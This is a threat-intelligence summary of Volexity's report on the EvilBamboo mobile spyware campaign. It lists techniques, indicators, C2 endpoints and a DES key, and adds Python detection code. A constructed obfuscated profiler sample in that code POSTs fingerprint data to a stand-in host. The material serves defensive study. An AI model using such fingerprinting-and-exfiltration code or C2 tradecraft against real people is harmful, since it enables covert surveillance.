EvilBamboo Targets Mobile Devices in Multi-year Campaign

Volexity documents a multi-year campaign by the state-aligned threat actor EvilBamboo that uses repackaged mobile apps, fake sites, Telegram communities, and browser profiling to deliver Android and iOS spyware. The actor operates at least three Android families (BADBAZAAR, BADSIGNAL, BADSOLAR), employs a custom JavaScript profiler (JMASK), and uses REST/raw-socket C2 channels to exfiltrate SMS, contacts, location, and other device data. #EvilBamboo #BADBAZAAR

Keypoints

  • EvilBamboo has run long-term campaigns targeting Tibetan, Uyghur, and Taiwanese communities using bespoke Android spyware families: BADBAZAAR, BADSIGNAL, and BADSOLAR.
  • Malware is distributed via repackaged legitimate apps, fake websites (e.g., signalplus[.]org, allwhatsapp[.]net), Telegram channels, APK forums, and occasionally the Apple App Store.
  • Code shared across the three families centers on the GetOperatorName() and DeviceInfo() functions, which profile the infected device and emit a JSON device object.
  • BADSOLAR and BADBAZAAR use a two-stage model: a small loader in the APK downloads a JAR from the C2 and loads it with DexClassLoader; the second-stage implant is AndroRAT-derived and exposes broad surveillance commands.
  • BADSIGNAL is a single-stage backdoored build of Signal that talks to a REST API on port 4432 (endpoints /api/Location, /api/values, /api/QRCode, /api/Proxy) to exfiltrate device and Signal data and to silently link an attacker-controlled device to the victim's Signal account.
  • JMASK, an obfuscated JavaScript profiler served from the fake sites under the name jquery.min.js, fingerprints the browser, collects locale, timezone and screen data, and checks for MetaMask accounts; Volexity assesses it decides which visitors receive an exploit (an exploit host on port 9001 and IRONSQUIRREL-style payloads).
  • Operational details include encrypted C2 strings (DES key “yhnrfv”), C2 over raw sockets and HTTP REST, certificate (SSL) pinning in some samples, and Telegram/Reddit/YouTube personas used to build trust and distribute the malware.

MITRE Techniques

  • [T1598] Phishing for Information – Fake websites and social media profiles were created “likely used to deploy browser-based exploits against targeted users.”
  • [T1203] Exploitation for Client Execution – The actor used a “Safari exploit to infect Uyghur users with custom iOS malware.”
  • [T1059.007] Command and Scripting Interpreter: JavaScript – The in-browser profiler (“JMASK is a custom profiler that is minified and obfuscated”) fingerprints visitors and triages them for exploitation.
  • [T1071] Application Layer Protocol – C2 communication used REST APIs and custom channels, e.g., “C2 communication through a REST API on port 4432” and raw sockets for other families.
  • [T1105] Ingress Tool Transfer – Loaders “download a JAR file from the C2 server and load it by using the DexClassLoader()” to deploy second-stage implants.
  • [T1027] Obfuscated Files or Information – The JMASK script was “obfuscated through the use of Unicode declarations of each string, which are declared in reverse.”
  • [T1005] Data from Local System – Malware commands collect device artifacts: “Get SMS messages, get call logs, get the device information, take photos, get the contacts list… get the location of the device.”
  • [T1036] Masquerading – Malware is “inserted as a backdoor into legitimate applications” and distributed as cracked or localized versions to appear legitimate.

Indicators of Compromise

  • [Domain] distribution/fake sites – signalplus[.]org, allwhatsapp[.]net (used to host and distribute backdoored apps; also related: flygram[.]org, groupgram[.]org, ignitetibet[.]net, comeflxyr[.]com, uyghurinfo[.]net, tibetone[.]org)
  • [IP address] hosting overlap – 45.154.12[.]80 (hosts ignitetibet[.]net and overlaps with uyghurinfo[.]net; related to distribution infrastructure)
  • [C2 domain] command-and-control – comeflxyr[.]com (decrypted BADSOLAR C2); the BADSIGNAL REST API hosts on port 4432 are not individually enumerated here
  • [URL] suspected exploit/IRONSQUIRREL – hxxps://jindjjdtc[.]com/HxtDp2fORTSU.html (iframe-linked from ignitetibet[.]net; assessed as similar to IRONSQUIRREL URIs)
  • [App names / filenames] repackaged apps and artifacts – cracked Whoscall APK (shared on APK forums), TibetOne iOS app (removed from App Store)
  • [JavaScript] profiler file – jquery.min.js (loaded an obfuscated profiling script, JMASK)

Volexity links the three Android families by the shared GetOperatorName() and DeviceInfo() functions, which build the JSON device profile used across the implants. BADBAZAAR and BADSOLAR (and their variants) use a two-stage model: the loader in the APK decrypts its C2 address (BADSOLAR's decrypts to comeflxyr[.]com with the DES key “yhnrfv”), downloads a JAR from that server and loads it with DexClassLoader. The second stage is AndroRAT-derived and exposes commands to collect SMS (including real-time forwarding), call logs, IMEI/IMSI, Wi‑Fi details, photos, contacts, installed apps, files, and location. Some BADBAZAAR samples add an updater flow (judgeUpdateOrNot / sbDownload) to fetch newer APKs. BADSIGNAL, by contrast, embeds the full backdoor in the main APK and communicates via a REST API on port 4432 with the endpoints /api/Location, /api/values, /api/QRCode and /api/Proxy, which exfiltrate device and Signal-specific data and silently link an attacker-controlled device to the victim's Signal account.

Distribution relies on social engineering: repackaged legitimate apps shared on APK forums, Telegram channels and Reddit posts, fake websites (signalplus[.]org, allwhatsapp[.]net, flygram[.]org), and in one case an app that made it into the Apple App Store (TibetOne). On the web side, the fake sites load an obfuscated JavaScript profiler (JMASK, served as jquery.min.js) that collects timezone, language, screen resolution, a canvas fingerprint, and MetaMask account data; Volexity assesses that JMASK triaged visitors and gated exploit delivery (an exploit host on port 9001 and likely IRONSQUIRREL payloads) so that exploits were served only to high-value targets.
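The obfuscation the page describes (string literals spelled as Unicode escapes of the reversed string, restored at runtime) is easy to undo once you know the pattern, and the restored strings are what a triage rule should match on. The Python below is an added example, not Volexity's tooling and not JMASK's code: it models that obfuscation on a constructed profiler snippet, reverses it, and then scores the result for the browser-fingerprinting APIs the page says JMASK reads. The exact JMASK layout, the sample script, and the profiler.example collection host are assumptions made for this example.

```python
"""Deobfuscate and triage a JMASK-style profiler script.

Added example, not Volexity's tooling and not JMASK itself. The obfuscation
scheme is modelled on the page's description (each string literal written as
\\uXXXX escapes of the reversed string, undone at runtime by a reverse-and-join
helper); the real JMASK layout is not reproduced. SAMPLE_SCRIPT is constructed.
"""
import re


def obfuscate_literal(s: str) -> str:
    """Encode a string the way the modelled profiler does: reverse it, then
    spell every character as a \\uXXXX escape inside double quotes."""
    return '"' + "".join(f"\\u{ord(c):04x}" for c in reversed(s)) + '"'


# Constructed sample in the style of a minified profiler. r() restores each
# literal at runtime; the collected fields are the ones the page lists.
SAMPLE_SCRIPT = (
    "var r=function(s){return s.split('').reverse().join('')};"
    f"var a=navigator[r({obfuscate_literal('language')})];"
    f"var b=Intl.DateTimeFormat().resolvedOptions()[r({obfuscate_literal('timeZone')})];"
    f"var c=screen[r({obfuscate_literal('width')})]+'x'+screen[r({obfuscate_literal('height')})];"
    f"var d=document.createElement(r({obfuscate_literal('canvas')})).toDataURL();"
    f"var e=window[r({obfuscate_literal('ethereum')})]?1:0;"  # MetaMask injects window.ethereum
    f"fetch(r({obfuscate_literal('https://profiler.example/collect')}),"
    f"{{method:r({obfuscate_literal('POST')}),body:JSON.stringify({{a:a,b:b,c:c,d:d,e:e}})}});"
)

# A double-quoted literal made only of \uXXXX escapes.
ESCAPED_LITERAL = re.compile(r'"((?:\\u[0-9a-fA-F]{4})+)"')


def decode_literal(escapes: str) -> str:
    """Turn a run of \\uXXXX escapes back into text and undo the reversal."""
    chars = re.findall(r"\\u([0-9a-fA-F]{4})", escapes)
    return "".join(chr(int(h, 16)) for h in chars)[::-1]


def deobfuscate(script: str) -> str:
    """Replace every escaped-and-reversed literal with its plaintext."""
    return ESCAPED_LITERAL.sub(lambda m: '"' + decode_literal(m.group(1)) + '"', script)


# Browser APIs the page says JMASK reads; every token of a group must appear
# in the deobfuscated script for that group to count.
PROFILING_MARKERS = {
    "locale": ("navigator", "language"),
    "timezone": ("resolvedOptions", "timeZone"),
    "screen": ("screen", "width", "height"),
    "canvas": ("canvas", "toDataURL"),
    "metamask": ("window", "ethereum"),
}


def profiling_indicators(script: str) -> dict:
    """Which fingerprinting groups the (deobfuscated) script references."""
    clean = deobfuscate(script)
    return {name: all(tok in clean for tok in toks)
            for name, toks in PROFILING_MARKERS.items()}


def is_jmask_like(script: str, threshold: int = 3) -> bool:
    """Heuristic: a reverse-string helper plus several profiling groups."""
    uses_reverse_helper = ".reverse().join(" in script
    return uses_reverse_helper and sum(profiling_indicators(script).values()) >= threshold


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_SCRIPT))
    print(profiling_indicators(SAMPLE_SCRIPT), is_jmask_like(SAMPLE_SCRIPT))
```

Run the heuristic over the decoded text, never the raw file: a matcher that looks for `navigator.language` in the obfuscated source sees only escape sequences. The threshold exists because a single canvas or timezone read is ordinary on legitimate sites; it is the combination with the reverse-string helper and several fingerprint groups that is worth a closer look.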

Operational and detection details: C2 traffic runs over HTTP REST APIs and raw sockets, some samples pin the server certificate, C2 strings are stored encrypted (DES key “yhnrfv” observed), and misconfigured C2 servers exposed API endpoints that revealed an iOS variant under development. Detection recommendations focus on blocking the enumerated domains and IPs, scanning decompiled APKs for the shared DeviceInfo/GetOperatorName code pattern, and looking for JMASK-like JavaScript profiling on web pages. Because BADSIGNAL abuses Signal's own device-linking feature, Signal users in the targeted communities can also check the Linked Devices list in the app for entries they did not add.
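The indicators above split naturally into two checks: network matches (the listed domains and IP, and the BADSIGNAL REST endpoints on port 4432) and code matches in decompiled Android source (GetOperatorName/DeviceInfo, DexClassLoader, the DES key string, the BADBAZAAR updater names). The Python below is an added example, not Volexity's tooling: it runs both checks over constructed input. The domains, IP, port and API paths are the ones on this page; the proxy-log format (timestamp, client, method, URL per line), the log lines, the hostname badsignal-c2.example, and the decompiled snippet are constructed for the example.

```python
"""Match traffic and decompiled code against the EvilBamboo indicators above.

Added example, not Volexity's tooling. The domains, IP, port and API paths
are the ones listed on this page; the proxy log (one "<ts> <client> <method>
<url>" line each), the decompiled snippet and the badsignal-c2.example host
are constructed for this example, as is the log format itself.
"""
import re
from urllib.parse import urlsplit

IOC_DOMAINS = {
    "signalplus.org", "allwhatsapp.net", "flygram.org", "groupgram.org",
    "ignitetibet.net", "comeflxyr.com", "uyghurinfo.net", "tibetone.org",
    "jindjjdtc.com",
}
IOC_IPS = {"45.154.12.80"}
BADSIGNAL_PORT = 4432
BADSIGNAL_PATHS = {"/api/Location", "/api/values", "/api/QRCode", "/api/Proxy"}


def check_url(url: str) -> list:
    """Return the reasons a URL matches the indicators (empty list = clean).

    Endpoint matching does not depend on the host list, so a BADSIGNAL C2 on
    a domain not yet known still trips on port 4432 plus one of its API paths.
    A bare port-4432 connection is reported separately as low confidence."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS):
        reasons.append(f"ioc-domain:{host}")
    if host in IOC_IPS:
        reasons.append(f"ioc-ip:{host}")
    if parts.port == BADSIGNAL_PORT:
        if parts.path in BADSIGNAL_PATHS:
            reasons.append(f"badsignal-api:{parts.path}")
        else:
            reasons.append("port-4432-only")
    return reasons


# Constructed proxy log: "<timestamp> <client> <method> <url>" per line.
SAMPLE_PROXY_LOG = """\
2023-09-20T10:01:02Z 10.0.0.5 GET https://www.example.com/index.html
2023-09-20T10:01:09Z 10.0.0.5 GET https://ignitetibet.net/jquery.min.js
2023-09-20T10:01:10Z 10.0.0.5 GET https://jindjjdtc.com/HxtDp2fORTSU.html
2023-09-20T10:02:30Z 10.0.0.7 POST https://badsignal-c2.example:4432/api/Location
2023-09-20T10:02:31Z 10.0.0.7 POST https://45.154.12.80/collect
2023-09-20T10:03:00Z 10.0.0.9 GET https://cdn.example.org:4432/health
"""
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def scan_proxy_log(lines) -> list:
    """Return (client, url, reasons) for every line that matches an indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # malformed line: skip it rather than abort the triage run
        _ts, client, _method, url = m.groups()
        reasons = check_url(url)
        if reasons:
            hits.append((client, url, reasons))
    return hits


# Code patterns from the page's analysis of the Android families. Run them
# over decompiled Java/smali text (e.g. jadx output), not over the raw APK.
CODE_PATTERNS = {
    "shared-profiler": re.compile(r"\b(?:GetOperatorName|DeviceInfo)\s*\("),
    "dex-loader": re.compile(r"\bDexClassLoader\s*\("),
    "des-key": re.compile(r'"yhnrfv"'),
    "badbazaar-updater": re.compile(r"\b(?:judgeUpdateOrNot|sbDownload)\b"),
}

# Constructed decompiled snippet shaped like the shared profiler code.
SAMPLE_DECOMPILED = """\
public static String GetOperatorName(Context ctx) { return tm.getNetworkOperatorName(); }
public static JSONObject DeviceInfo(Context ctx) {
    JSONObject o = new JSONObject();
    o.put("operator", GetOperatorName(ctx));
    return o;
}
static final String C2_KEY = "yhnrfv";
DexClassLoader loader = new DexClassLoader(jarPath, optDir, null, getClassLoader());
"""


def scan_decompiled_source(text: str) -> dict:
    """Count how often each code pattern appears in decompiled source text."""
    return {name: len(pat.findall(text)) for name, pat in CODE_PATTERNS.items()}


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG.splitlines()):
        print(hit)
    print(scan_decompiled_source(SAMPLE_DECOMPILED))
```

The domain check also matches subdomains, so www.signalplus.org is caught by the signalplus.org entry. The code-pattern counts are a prioritisation aid, not a verdict: DexClassLoader has legitimate uses in plugin frameworks, and the shared-profiler hit only becomes interesting alongside the DES key string or the updater names.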

Read more: https://www.volexity.com/blog/2023/09/22/evilbamboo-targets-mobile-devices-in-multi-year-campaign/